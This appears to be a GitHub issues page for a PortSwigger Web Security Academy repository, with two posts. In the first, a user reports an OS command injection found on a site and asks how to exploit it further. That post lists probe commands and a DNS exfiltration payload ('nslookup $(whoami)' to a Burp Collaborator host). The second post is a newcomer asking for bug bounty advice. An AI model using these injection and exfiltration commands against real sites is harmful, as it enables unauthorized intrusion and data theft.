frank-leitner / portswigger-websecurity-academy Goto Github PK

A few days ago I found a vulnerability in a site of interest through burp suite scanner using nslookup xxx.burpcolaborator.com exploit with the following feature

Issue: OS command injection
Severity: High
Confidence: Certain

the vulnerability only responds when using ` and only responds to the nslookup, sleep and ping including the burp colaborator.

These are the only commands it respond to.

nslookup xxx.burpcolaborator.com
ping xxx.burpcolaborator.com
sleep 10

other commands like nslookup $(whoami).xxx.burp collaborator.com They do not give any answer, please I would appreciate it if you could help me with this problem since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.

I await your response.
Thanx

Hello Frank Leitner very nice to meet you, I'm Luis Fernando Mendoza from Mexico I'm a software engineer with more than 6 years of experience in the field of web development and I'm starting in the cybersecurity world and I was reading the description of this repository and I'm too following the video tutorials of Rana Khalil, I was wondering if you have some advice to me, I'm trying to enter de world of bug bounty, how was your approach into this field, what things to keep in mind when entering this field, etc etc, I'm very passionate on this topics, thank you in advance!

PD: I sent a linkedin invitation, thank you!